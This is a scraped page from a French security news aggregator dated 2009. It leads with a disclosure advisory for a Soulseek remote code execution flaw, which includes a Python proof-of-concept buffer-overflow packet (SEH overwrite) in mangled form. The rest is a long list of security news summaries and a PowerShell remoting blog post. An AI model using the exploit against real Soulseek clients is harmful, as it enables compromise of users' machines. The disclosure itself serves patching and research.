http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2009-07-03 07:01:53 - Laurent Gaffié blog : Soulseek 157 NS 13e et 156* Remote Peer Search Code Execution=============================================- Release date: July 02, 2009- Discovered by: Laurent Gaffié- Severity: critical=============================================I VULNERABILITY-------------------------Soulseek 157 NS 13e et 156* Remote Peer Search Code ExecutionII BACKGROUND-------------------------"Soulseektm is a unique ad-free, spyware free, and just plain freefilesharing applicationOne of the things that makes Soulseektm unique is our community andcommunity-related featuresBased on peer-to-peer technology, virtual rooms allow you to meetpeople withthe same interests, share information, and chat freely using real-timemessagesin public or privateSoulseektm, with its built-in people matching system, is a great wayto makenew friends and expand your mind"III DESCRIPTION-------------------------Soulseek client allows direct peer file search, allowing a user tofind the files he wants directly on thepeer computerUnfortunatly this feature is vulnerable to a remote SEH overwriteIV PROOF OF CONCEPT-------------------------This proof of concept will target a user called 123yow123import structimport sys, socketfrom time import *ip = "IP_ADDR"port = "PORT_NUM" #You can find out, how to find out IP/PORT if youRTFM :s = socketsocketsocketAF_INET, socketSOCK_STREAMtry:sconnectip,portexcept:print "Can\'t connect to peer"sysexit0junk = "x41" * 3084next_seh = structpack'seh = structpack'other_junk = "x61" * 1424buffer ="x17x00x00x00x01x09x00x00x00x31x32x33x79x6fx77x31"buffer+="x32x33x01x00x00x00x50x00x00x00x00x21x0cx00x00x08"buffer+="x00x00x00x6cx7bx1dx0cx15x0cx00x00"+junk+next_seh+seh+other_junkssendbufferAfter the query is send, the SEH handler will get overwritenV BUSINESS IMPACT-------------------------An attacker could exploit this vulnerability to compromise any priorto 157 NS 13e Soulseek clientVI SYSTEMS AFFECTED-------------------------Windows all versionsVII SOLUTION-------------------------Upgrade to 157 NS 13ehttp://slsknetorg/downloadhtmlVIII REFERENCES-------------------------http://wwwslsknetorgIX CREDITS-------------------------This vulnerability has been discovered by Laurent GaffiéLaurentgaffie{remove-this}atgmailcomX REVISION HISTORY-------------------------july 02, 2009XI LEGAL NOTICES-------------------------The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or otherwiseI accept no responsibility for any damage caused by the use ormisuse of this informationXII PERSONAL NOTES------------------------Souleek team as patched this bug month ago, a distributed messageurging users to upgrade them Soulseek clientis still send since a month, and not much users still use vulnerableSoulseek versions@to the one who like to rip bugs and make an exploit ""universal"" forfame, just make sure it's at leastuniversal before you say soFor the others : http://wwwyoutubecom/watchv=tVACUjHn6yU :@RIIA : http://wwwopenp2pcom/pub/a/p2p/2002/12/11/piracyhtmlIMAGEhttp://www.secuobs.com/revue/news/116614.shtmlhttp://www.secuobs.com/revue/news/116614.shtml 2009-07-03 02:36:44 - milw0rm.com : http://www.secuobs.com/revue/news/116544.shtmlhttp://www.secuobs.com/revue/news/116544.shtml 2009-07-03 02:36:44 - milw0rm.com : http://www.secuobs.com/revue/news/116543.shtmlhttp://www.secuobs.com/revue/news/116543.shtml 2009-07-02 22:52:08 - FSecure Antivirus Research Weblog : Charlie Miller, a well-known security researcher who specializes in Macand iPhone security, yesterday revealed information about a newvulnerability in iPhone that allows remote code execution via SMS Nota lot is known about the vulnerability, which was announced at theSyScan conference in Singapore, except that Charlie is working withApple to get it fixed as soon as possibleIMAGEpicture from applecomThis is about as bad as it gets as the vulnerability seems to allowunsigned code to run which circumvents a core part of iPhone'ssecurity model as it's usually only able to run signed code, ie Appsthat have been approved by Apple No user-interaction required whichis unlike current mobile malware InfoWorld has the original storyherePS I’m shift manager for one of our three daily response shifts thisweek and I'm tweeting about what we’re doing in the shift over athttp://twittercom/patrikrunaldOn 02/07/09 At 06:30 PMhttp://www.secuobs.com/revue/news/116482.shtmlhttp://www.secuobs.com/revue/news/116482.shtml 2009-07-02 22:19:35 - milw0rm.com : http://www.secuobs.com/revue/news/116451.shtmlhttp://www.secuobs.com/revue/news/116451.shtml 2009-07-02 22:19:35 - milw0rm.com : http://www.secuobs.com/revue/news/116450.shtmlhttp://www.secuobs.com/revue/news/116450.shtml 2009-07-02 22:19:35 - milw0rm.com : http://www.secuobs.com/revue/news/116449.shtmlhttp://www.secuobs.com/revue/news/116449.shtml 2009-07-02 17:40:23 - milw0rm.com : http://www.secuobs.com/revue/news/116346.shtmlhttp://www.secuobs.com/revue/news/116346.shtml 2009-07-02 05:57:37 - Hack In The Box : Cyber criminals work hard each day trying to spread their maliciousactivities, and there are no signs that they are going to stop On thecontrary, they are doing their best to improve their attacks andincrease the success of them This time security experts from Finjanare warning everybody against the hacked 'iirs-nrsagovin' website ofIndia's Institute of Remote Sensing Cyber criminals are using thiswebsite as a malicious code distribution channel How does the wholeattack occur And what is the hackers purpose of using it The attackinvolves the injection of a script into a website which adds an IFrameto the page The researchers from Finjan explained that "The IFramecreated by this script points to malicious content hosted on a serverin Texas armed with the LuckySploit attack toolkit"http://www.secuobs.com/revue/news/116163.shtmlhttp://www.secuobs.com/revue/news/116163.shtml 2009-07-02 00:23:29 - milw0rm.com : http://www.secuobs.com/revue/news/116059.shtmlhttp://www.secuobs.com/revue/news/116059.shtml 2009-07-02 00:23:29 - milw0rm.com : http://www.secuobs.com/revue/news/116058.shtmlhttp://www.secuobs.com/revue/news/116058.shtml 2009-07-02 00:23:29 - milw0rm.com : http://www.secuobs.com/revue/news/116057.shtmlhttp://www.secuobs.com/revue/news/116057.shtml 2009-07-01 20:23:05 - milw0rm.com : http://www.secuobs.com/revue/news/115949.shtmlhttp://www.secuobs.com/revue/news/115949.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115446.shtmlhttp://www.secuobs.com/revue/news/115446.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115445.shtmlhttp://www.secuobs.com/revue/news/115445.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115443.shtmlhttp://www.secuobs.com/revue/news/115443.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115439.shtmlhttp://www.secuobs.com/revue/news/115439.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115438.shtmlhttp://www.secuobs.com/revue/news/115438.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115437.shtmlhttp://www.secuobs.com/revue/news/115437.shtml 2009-06-30 13:48:42 - Rootsecure.net : Google Blog: High court won't block remote storage DVR systemhttp://www.secuobs.com/revue/news/115239.shtmlhttp://www.secuobs.com/revue/news/115239.shtml 2009-06-30 04:57:22 - Slashdot Your Rights Online : Immutate and several other readers noted that Cablevision will be allowedto go ahead with deploying a remote-storage DVR system, when the USSupreme Court declined without comment to hear an appeal of a lowercourt ruling that went against movie studios and TV networks Wediscussed this case a few months back "Cable TV operators won a keylegal battle against Hollywood studios and television networks onMonday as the Supreme Court declined to block a new digital videorecording system that could make it even easier for viewers to bypasscommercials The justices declined to hear arguments on whetherCablevision Systems Corp's remote-storage DVR system would violatecopyright laws That allows the company to proceed with plans tostart deploying the technology this summer"IMAGERead more of this story at SlashdotIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/115110.shtmlhttp://www.secuobs.com/revue/news/115110.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115021.shtmlhttp://www.secuobs.com/revue/news/115021.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115016.shtmlhttp://www.secuobs.com/revue/news/115016.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115015.shtmlhttp://www.secuobs.com/revue/news/115015.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115013.shtmlhttp://www.secuobs.com/revue/news/115013.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115012.shtmlhttp://www.secuobs.com/revue/news/115012.shtml 2009-06-29 19:47:43 - milw0rm.com : http://www.secuobs.com/revue/news/114923.shtmlhttp://www.secuobs.com/revue/news/114923.shtml 2009-06-29 19:30:37 - Security Bloggers Network : "A big challenge for identifying web application attacks is to detectmalicious activity that cannot easily be spotted using usingsignatures Remote file inclusion RFI is a popular technique used toattack web applications especially php applications from a remoteserver RFI attacks are extremely dangerous as they allow a clienthttp://www.secuobs.com/revue/news/114902.shtmlhttp://www.secuobs.com/revue/news/114902.shtml 2009-06-29 07:46:00 - Security Park : High profile incidents, in both urban and country areas across Britain,including individuals being tied-up and threatened in their own homesduring robberies, has underlined the vulnerability of residentialproperties to attack Alongside this, figures released by the HomeOffice last month which cover England and Wales show that a secondconsecutive quarterly rise in recorded crime figures for morehttp://www.secuobs.com/revue/news/114742.shtmlhttp://www.secuobs.com/revue/news/114742.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114597.shtmlhttp://www.secuobs.com/revue/news/114597.shtml 2009-06-26 22:56:51 - milw0rm.com : http://www.secuobs.com/revue/news/114262.shtmlhttp://www.secuobs.com/revue/news/114262.shtml 2009-06-26 03:09:33 - Hack In The Box : Sony earlier released a minor system update for the PS3 According to theofficial announcement by Eric Lempel, the PS3 update 280 will improvethe playback quality of some PS3 format software But it looks likethe firmware update is not just to improve the quality of games asdashhacker have discovered Apparently the new update blocks OpenRemote Play, a homebrew program created by dashhacker that allows youto access the PS3's Remote Play feature from any laptop, desktop ormobile phonehttp://www.secuobs.com/revue/news/113904.shtmlhttp://www.secuobs.com/revue/news/113904.shtml 2009-06-25 13:57:55 - Latest Security Products entries at ESecurity Planet Product Guide : Invisible laptop keyboard monitoring tool is specially designed for userswho want to monitor PC keyboard activities Jun 24, 2009http://www.secuobs.com/revue/news/113600.shtmlhttp://www.secuobs.com/revue/news/113600.shtml 2009-06-25 13:57:55 - Latest Security Products entries at ESecurity Planet Product Guide : Remotely Monitor your Webcam, Desktop, Microphone, or Phone-Line Jun24, 2009http://www.secuobs.com/revue/news/113598.shtmlhttp://www.secuobs.com/revue/news/113598.shtml 2009-06-25 01:57:26 - Systm Large Quicktime : Want access to your files stored at home How about hosting a home webserver Static IPs are expensive, if you can even get one We set upDynamic DNS insteadhttp://www.secuobs.com/revue/news/113415.shtmlhttp://www.secuobs.com/revue/news/113415.shtml 2009-06-25 01:57:26 - Systm Large Quicktime : We update the classic beer keg with motorized wheels and a remotecontrol tap to build the ultimate robotic beer keghttp://www.secuobs.com/revue/news/113401.shtmlhttp://www.secuobs.com/revue/news/113401.shtml 2009-06-24 22:16:54 - Rootsecure.net : Boing Boing: Exploit code for China's "Green Dam" censorship app permitsremote control of any Chinese PChttp://www.secuobs.com/revue/news/113324.shtmlhttp://www.secuobs.com/revue/news/113324.shtml 2009-06-24 21:48:30 - milw0rm.com : http://www.secuobs.com/revue/news/113299.shtmlhttp://www.secuobs.com/revue/news/113299.shtml 2009-06-24 21:48:30 - milw0rm.com : http://www.secuobs.com/revue/news/113298.shtmlhttp://www.secuobs.com/revue/news/113298.shtml 2009-06-24 18:05:00 - Alerts : IACommand is a program that may be installed as part of a remote accessapplicationhttp://www.secuobs.com/revue/news/113193.shtmlhttp://www.secuobs.com/revue/news/113193.shtml 2009-06-24 17:33:05 - Packet Storm Security Headlines : http://www.secuobs.com/revue/news/113173.shtmlhttp://www.secuobs.com/revue/news/113173.shtml 2009-06-23 20:32:34 - milw0rm.com : http://www.secuobs.com/revue/news/112814.shtmlhttp://www.secuobs.com/revue/news/112814.shtml 2009-06-23 20:32:34 - milw0rm.com : http://www.secuobs.com/revue/news/112813.shtmlhttp://www.secuobs.com/revue/news/112813.shtml 2009-06-23 20:32:34 - milw0rm.com : http://www.secuobs.com/revue/news/112812.shtmlhttp://www.secuobs.com/revue/news/112812.shtml 2009-06-23 20:32:34 - milw0rm.com : http://www.secuobs.com/revue/news/112811.shtmlhttp://www.secuobs.com/revue/news/112811.shtml 2009-06-23 15:38:29 - Cryptome : June 23, 2009http://www.secuobs.com/revue/news/112664.shtmlhttp://www.secuobs.com/revue/news/112664.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112427.shtmlhttp://www.secuobs.com/revue/news/112427.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112425.shtmlhttp://www.secuobs.com/revue/news/112425.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112423.shtmlhttp://www.secuobs.com/revue/news/112423.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112420.shtmlhttp://www.secuobs.com/revue/news/112420.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112419.shtmlhttp://www.secuobs.com/revue/news/112419.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112418.shtmlhttp://www.secuobs.com/revue/news/112418.shtml 2009-06-22 19:56:45 - milw0rm.com : http://www.secuobs.com/revue/news/112333.shtmlhttp://www.secuobs.com/revue/news/112333.shtml 2009-06-22 19:56:45 - milw0rm.com : http://www.secuobs.com/revue/news/112332.shtmlhttp://www.secuobs.com/revue/news/112332.shtml 2009-06-18 22:02:54 - milw0rm.com : http://www.secuobs.com/revue/news/111319.shtmlhttp://www.secuobs.com/revue/news/111319.shtml 2009-06-18 01:16:43 - 4sysops : In my last article I covered ManageEngine Desktop Central’s capabilitieswith regard to configuration management, software deployment, andpatch management I outlined that all three tasks are basicallyConfigurations Desktop Central has a few functions that are notorganized as Configurations The integrated Inventory solution is oneof these It has its own tab where http://www.secuobs.com/revue/news/110967.shtmlhttp://www.secuobs.com/revue/news/110967.shtml 2009-06-17 22:40:46 - milw0rm.com : http://www.secuobs.com/revue/news/110932.shtmlhttp://www.secuobs.com/revue/news/110932.shtml 2009-06-17 04:48:20 - Hack In The Box : Security researcher Charlie Miller and Vincenzo Iozzo, a student at theUniversity of Milan, recently discovered a repeatable method to trickthe iPhone's processor to run unsigned code The pair now plan revealtheir work at the Black Hat Security Conference in Las Vegas nextmonth There have been very few exploits for the iPhone thus far,since the iPhone's security system generally prevents runningarbitrary code However, Miller and Iozzo discovered a method toenable a working shell, which could let a hacker do virtually anythingwithin the system, including copying private data Their method,combined with an iPhone OS exploit, has the potential to allow hackersto run virtually any code they want on the device We talked to Millerto get some more details about how this is possiblehttp://www.secuobs.com/revue/news/110563.shtmlhttp://www.secuobs.com/revue/news/110563.shtml 2009-06-17 04:00:30 - milw0rm.com : http://www.secuobs.com/revue/news/110521.shtmlhttp://www.secuobs.com/revue/news/110521.shtml 2009-06-15 23:59:17 - milw0rm.com : http://www.secuobs.com/revue/news/109996.shtmlhttp://www.secuobs.com/revue/news/109996.shtml 2009-06-15 23:59:17 - milw0rm.com : http://www.secuobs.com/revue/news/109994.shtmlhttp://www.secuobs.com/revue/news/109994.shtml 2009-06-15 23:59:17 - milw0rm.com : http://www.secuobs.com/revue/news/109993.shtmlhttp://www.secuobs.com/revue/news/109993.shtml 2009-06-15 23:43:42 - Help Net Security News : The new D-Link Network Camera DCS-1100 is 'mydlink-enabled', allowingit to be easily viewed and managed by the mydlink portal A wireless80211n version, the DCS-1130, is expected to ship at end ohttp://www.secuobs.com/revue/news/109973.shtmlhttp://www.secuobs.com/revue/news/109973.shtml 2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Critical - This security update resolves twoprivately reported vulnerabilities in implementations of ActiveDirectory on Microsoft Windows 2000 Server and Windows Server 2003,and Active Directory Application Mode ADAM when installed on WindowsXP Professional and Windows Server 2003 The more severe vulnerabilitycould allow remote code execution An attacker who successfullyexploited this vulnerability could take complete control of anaffected system remotely An attacker could then install programs;view, change, or delete data; or create new accounts with full userrights Firewall best practices and standard default firewallconfigurations can help protect networks from attacks that originateoutside the enterprise perimeter Best practices recommend thatsystems that are connected to the Internet have a minimal number ofports exposedhttp://www.secuobs.com/revue/news/109944.shtmlhttp://www.secuobs.com/revue/news/109944.shtml 2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Critical - This security update resolves severalprivately reported vulnerabilities that could allow remote codeexecution if a user opens a specially crafted Excel file that includesa malformed record object An attacker who successfully exploited anyof these vulnerabilities could take complete control of an affectedsystem An attacker could then install programs; view, change, ordelete data; or create new accounts with full user rightshttp://www.secuobs.com/revue/news/109941.shtmlhttp://www.secuobs.com/revue/news/109941.shtml 2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Critical - This security update resolves threeprivately reported vulnerabilities in Windows Print Spooler The mostsevere vulnerability could allow remote code execution if an affectedserver received a specially crafted RPC request Firewall bestpractices and standard default firewall configurations can helpprotect networks from attacks that originate outside the enterpriseperimeter Best practices recommend that systems that are connected tothe Internet have a minimal number of ports exposedhttp://www.secuobs.com/revue/news/109940.shtmlhttp://www.secuobs.com/revue/news/109940.shtml 2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Critical - This security update resolves aprivately reported vulnerability in the Microsoft Works convertersThe vulnerability could allow remote code execution if a user opens aspecially crafted Works file An attacker who successfully exploitedthis vulnerability could gain the same user rights as the local userUsers whose accounts are configured to have fewer user rights on thesystem could be less impacted than users who operate withadministrative user rightshttp://www.secuobs.com/revue/news/109938.shtmlhttp://www.secuobs.com/revue/news/109938.shtml 2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Critical - This security update resolves twoprivately reported vulnerabilities that could allow remote codeexecution if a user opens a specially crafted Word file An attackerwho successfully exploited this vulnerability could take completecontrol of an affected system An attacker could then installprograms; view, change, or delete data; or create new accounts withfull user rightshttp://www.secuobs.com/revue/news/109935.shtmlhttp://www.secuobs.com/revue/news/109935.shtml 2009-06-15 20:49:56 - Reverse Engineering Mac OS X : I started working on Remote Buddy http://wwwiospiritcom to test mymodule Onyx The Black Cat Some encrypted files are stored in the harddisk fs_usage is your friend but even after deleting all of them,the program still had expired trial Gdb to the rescue… After findingthe correct “entrypoint” I call entrypoint to the correct addresshttp://www.secuobs.com/revue/news/109901.shtmlhttp://www.secuobs.com/revue/news/109901.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109885.shtmlhttp://www.secuobs.com/revue/news/109885.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109884.shtmlhttp://www.secuobs.com/revue/news/109884.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109883.shtmlhttp://www.secuobs.com/revue/news/109883.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109882.shtmlhttp://www.secuobs.com/revue/news/109882.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109880.shtmlhttp://www.secuobs.com/revue/news/109880.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109879.shtmlhttp://www.secuobs.com/revue/news/109879.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109877.shtmlhttp://www.secuobs.com/revue/news/109877.shtml 2009-06-15 01:20:53 - Secdev Thierry Zoller : Subscribe to the RSS feed in case you are interested in updates Releasemode: ZDI see previous timelines to know why this went to ZDI Ref :TZO-37-2009 - Apple Safari RemoteSecurity news : http://blogzollerluIMAGE IMAGE IMAGE IMAGEIMAGEhttp://www.secuobs.com/revue/news/109637.shtmlhttp://www.secuobs.com/revue/news/109637.shtml 2009-06-13 00:15:44 - milw0rm.com : http://www.secuobs.com/revue/news/109231.shtmlhttp://www.secuobs.com/revue/news/109231.shtml 2009-06-13 00:15:44 - milw0rm.com : http://www.secuobs.com/revue/news/109230.shtmlhttp://www.secuobs.com/revue/news/109230.shtml 2009-06-13 00:15:44 - milw0rm.com : http://www.secuobs.com/revue/news/109229.shtmlhttp://www.secuobs.com/revue/news/109229.shtml 2009-06-13 00:15:44 - milw0rm.com : http://www.secuobs.com/revue/news/109228.shtmlhttp://www.secuobs.com/revue/news/109228.shtml 2009-06-12 22:20:24 - adafruit industries blog : The Prototype “LV Tanker”…http://www.secuobs.com/revue/news/109201.shtmlhttp://www.secuobs.com/revue/news/109201.shtml 2009-06-12 19:31:27 - milw0rm.com : http://www.secuobs.com/revue/news/109116.shtmlhttp://www.secuobs.com/revue/news/109116.shtml 2009-06-12 17:01:14 - milw0rm.com : http://www.secuobs.com/revue/news/109046.shtmlhttp://www.secuobs.com/revue/news/109046.shtml 2009-06-12 17:01:14 - milw0rm.com : http://www.secuobs.com/revue/news/109043.shtmlhttp://www.secuobs.com/revue/news/109043.shtml 2009-06-12 01:48:34 - milw0rm.com : http://www.secuobs.com/revue/news/108786.shtmlhttp://www.secuobs.com/revue/news/108786.shtml 2009-06-11 23:24:05 - milw0rm.com : http://www.secuobs.com/revue/news/108731.shtmlhttp://www.secuobs.com/revue/news/108731.shtml 2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : http://www.secuobs.com/revue/news/108728.shtmlhttp://www.secuobs.com/revue/news/108728.shtml 2009-06-11 18:45:56 - milw0rm.com : http://www.secuobs.com/revue/news/108573.shtmlhttp://www.secuobs.com/revue/news/108573.shtml 2009-06-11 14:02:46 - Security Park : Finning UK, a division of Finning International Inc the world'slargest distributor of Caterpillar equipment and power systems, hasturned to SecurEnvoy to provide an extra layer of security for itsremote workers Finning UK has signed a deal with SecurEnvoy toimplement SecurAccess, which replaces its previous token system forremote working SecurAccess provides employees with 'virtual tmorehttp://www.secuobs.com/revue/news/108467.shtmlhttp://www.secuobs.com/revue/news/108467.shtml 2009-06-10 19:52:43 - milw0rm.com : http://www.secuobs.com/revue/news/108106.shtmlhttp://www.secuobs.com/revue/news/108106.shtml 2009-06-10 19:52:43 - milw0rm.com : http://www.secuobs.com/revue/news/108104.shtmlhttp://www.secuobs.com/revue/news/108104.shtml 2009-06-10 02:16:34 - Security Bloggers Network : Novell INC’s NasdaqGS: NOVL SuSE Linux unit has released aearly-in-the-week security update focusing on the Open Sourcedistribution Specifically, the a critical vulnerability, kernelbased, which permits remote, and arbitrary code execution Moreinformation, including the full text announcement, MITRE CVEenumerated vulnerability listings specifically CVE-2008-4554,CVE-2008-5702, CVE-2009-0028, CVE-2009-0065, CVE-2009-0269,CVE-2009-0322, CVE-2009-0676, CVE-2009-0834, CVE-2009-0835, http://www.secuobs.com/revue/news/107744.shtmlhttp://www.secuobs.com/revue/news/107744.shtml 2009-06-09 23:51:13 - milw0rm.com : http://www.secuobs.com/revue/news/107704.shtmlhttp://www.secuobs.com/revue/news/107704.shtml 2009-06-09 23:51:13 - milw0rm.com : http://www.secuobs.com/revue/news/107703.shtmlhttp://www.secuobs.com/revue/news/107703.shtml 2009-06-09 23:36:59 - 4sysops : Webhost hack wipes out data for 100,000 sites Mark Russinovich onWindows 7 UAC Very comprehensive Paul Thurrott: Windows 7: The NewNT I strongly disagree NT was a milestone Windows 7 is evolutionIntroducing Windows 7 and Windows Server 2008 R2 RemoteApp and DesktopConnections What’s new in Windows 7’s System Tray Copyright © http://www.secuobs.com/revue/news/107684.shtmlhttp://www.secuobs.com/revue/news/107684.shtml 2009-06-09 21:53:50 - milw0rm.com : http://www.secuobs.com/revue/news/107637.shtmlhttp://www.secuobs.com/revue/news/107637.shtml 2009-06-09 21:25:54 - GNUCITIZEN : I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability,despite it being a serious bug affecting a popular open-sourceproject I think this vulnerability is a nice reminder that it’s stillpossible to perform remote command execution these days withoutrelying on SQL injection ie: xp_cmdshell or a memory corruptionbug ie: heap overflow All the documentation you need is in thescript comments http://www.secuobs.com/revue/news/107613.shtmlhttp://www.secuobs.com/revue/news/107613.shtml 2009-06-09 19:22:52 - milw0rm.com : http://www.secuobs.com/revue/news/107571.shtmlhttp://www.secuobs.com/revue/news/107571.shtml 2009-06-09 19:17:47 - Infosecurity.US : Novell INC’s NasdaqGS: NOVL SuSE Linux unit has released aearly-in-the-week security update focusing on the Open Sourcedistribution Specifically, the a critical vulnerability, kernelbased, which permits remote, and arbitrary code execution Moreinformation, including the full text announcement, MITRE CVEenumerated vulnerability listings specifically CVE-2008-4554,CVE-2008-5702, CVE-2009-0028, CVE-2009-0065, CVE-2009-0269,CVE-2009-0322, CVE-2009-0676, CVE-2009-0834, CVE-2009-0835, http://www.secuobs.com/revue/news/107567.shtmlhttp://www.secuobs.com/revue/news/107567.shtml 2009-06-09 00:17:38 - milw0rm.com : http://www.secuobs.com/revue/news/107170.shtmlhttp://www.secuobs.com/revue/news/107170.shtml 2009-06-08 22:24:37 - milw0rm.com : http://www.secuobs.com/revue/news/107135.shtmlhttp://www.secuobs.com/revue/news/107135.shtml 2009-06-08 22:24:37 - milw0rm.com : http://www.secuobs.com/revue/news/107134.shtmlhttp://www.secuobs.com/revue/news/107134.shtml 2009-06-08 22:24:37 - milw0rm.com : http://www.secuobs.com/revue/news/107133.shtmlhttp://www.secuobs.com/revue/news/107133.shtml 2009-06-08 22:24:37 - milw0rm.com : http://www.secuobs.com/revue/news/107132.shtmlhttp://www.secuobs.com/revue/news/107132.shtml 2009-06-08 22:24:37 - milw0rm.com : http://www.secuobs.com/revue/news/107130.shtmlhttp://www.secuobs.com/revue/news/107130.shtml 2009-06-08 19:58:06 - milw0rm.com : http://www.secuobs.com/revue/news/107041.shtmlhttp://www.secuobs.com/revue/news/107041.shtml 2009-06-08 19:58:06 - milw0rm.com : http://www.secuobs.com/revue/news/107040.shtmlhttp://www.secuobs.com/revue/news/107040.shtml 2009-06-08 17:54:27 - milw0rm.com : http://www.secuobs.com/revue/news/106990.shtmlhttp://www.secuobs.com/revue/news/106990.shtml 2009-06-08 04:58:00 - In.Security Home : I interviewed Dr Stefan Savage, the professor at the University ofCalifornia San Diego, that directed the research team that developed aprototype for analyzing the images of keys to decode their bittingcode The team issued a report last week that detailed its findingsAlthough remote optical capture of bitting information is not new, thehttp://www.secuobs.com/revue/news/106780.shtmlhttp://www.secuobs.com/revue/news/106780.shtml 2009-06-06 17:47:40 - gHacks technology news : DreamSys Server Monitor, once a commercial remote server monitoringsoftware, is now available as a free download from the developer’shomepage The user still needs to enter registration information afterinstallation They are however available on the homepage without theneed for registration or any other kind of data grabbing The ServerMonitor application can http://www.secuobs.com/revue/news/106538.shtmlhttp://www.secuobs.com/revue/news/106538.shtml 2009-06-05 22:46:34 - milw0rm.com : http://www.secuobs.com/revue/news/106394.shtmlhttp://www.secuobs.com/revue/news/106394.shtml 2009-06-05 22:46:34 - milw0rm.com : http://www.secuobs.com/revue/news/106393.shtmlhttp://www.secuobs.com/revue/news/106393.shtml 2009-06-05 22:46:34 - milw0rm.com : http://www.secuobs.com/revue/news/106391.shtmlhttp://www.secuobs.com/revue/news/106391.shtml 2009-06-05 05:21:07 - Windows PowerShell Blog : PowerShell V2 introduces a new capability which allows you to remotelymanage machines in your organization You may have already tried thisnew feature In this blog, I will show how an administrator can managedifferent remote sessions created by different users from differentclientsScenario: Using PowerShell remoting, normal users can performnon-admin tasks on a machine remotely There might be situations wherean Administrator of the machine may want to terminate specificsessions created by specific usersThis Administrator task can be achieved by just restarting WinRMservice However this is not a good solution as it would close all theremote sessions including the Administrator’s sessions if any Toremove specific sessions, WSMan/WinRM provides cmdletsGet-WSManInstance et Remove-WSManInstance I will show you how thisworks# Create a remote session as a normal userPS C: $env:computernameKRISCV-LHPS C: $s = nsn kriscv-jhoom -cred kriscv-jhoom estuser-Authentication negotiatePS C: $sId Name ComputerName State ConfigurationName Availability-- ---- ------------ ----- ----------------- ------------6 Session6 kriscv-jhoom Opened MicrosoftPowerShell AvailablePS C:From machine KRISCV-LH, I connected to KRISCV-JHOOM as a testuserThis testuser is not an admin on Kriscv-Jhoom Let’s say this testuseris consuming lot of CPU on Kriscv-Jhoom and not letting others to dotheir work In this scenario, the Administrator of Kriscv-Jhoom candelete the remote sessions created by testuser using Get-WSManInstanceand Remove-WSManInstance cmdlets These cmdlets are remote enabledmeaning that these cmdlets can be run either locally on Kriscv-Jhoomor from a remote machine You should provide Administratorcredentials Let’s see how this works:PS C: $env:computernameKRISCV-Win7PS C: Get-WSManInstance -ConnectionURIhttp://kriscv-jhoomwingroupwindeployntdevmicrosoftcom:5985/wsman shell -enumerate -cred wingroupkriscvrsp : http://schemasmicrosoftcom/wbem/wsman/1/windows/shelllang : en-USShellId : 884D2DB4-C454-4F1C-9AF6-A7DA3D5D8BD7ResourceUri :http://schemasmicrosoftcom/powershell/MicrosoftPowerShellOwner : kriscv-jhoom estuserClientIP : 2001:4898:2b:2:4878:5933:c82c:2cbdIdleTimeOut : PT180000SInputStreams : stdin prOutputStreams : stdoutShellRunTime : P0DT0H17M33SShellInactivity : P0DT0H0M33SNotice how I am using Get-WSManInstance In the ConnectURI parameter,I am using the port number 5985 as the WinRM/WSMan service onKriscv-Jhoom is listening on this port That brings us to the point ofPort change By default starting from Win7 RC, WinRM listens on port5985 not port 80for http traffic The /WSMan in the query portionimplies to retrieve remote sessions serviced by WSMan WinRM serviceNotice the output, for each remotely created session you are gettinginformation like user who created this session, from which clientmachine is this remote session established, the ID, the runtimedescribing how many days,hours,minutes and seconds the session isactive etcTo remove the session, use Remove-WSManInstance cmdlet supplying theID like this:PS C: remove-WSManInstance -ConnectionURIhttp://kriscv-jhoomwingroupwindeployntdevmicrosoftcom:5985/wsman shell @{ShellID="884D2DB4-C454-4F1C-9AF6-A7DA3D5D8BD7"}-cred wingroupkriscvThis will remove the session created by testuserNow let’s see how this is reflected in the $s session variablecreated by testuser on Kriscv-LHPS C: $env:computernameKRISCV-LHPS C: $sId Name ComputerName State ConfigurationName Availability-- ---- ------------ ----- ----------------- ------------6 Session6 kriscv-jhoom Broken MicrosoftPowerShell NoneThe session is Broken So testuser has to create a new session tocontinue his work An Administrator can choose to totally blocktestuser from a creating any 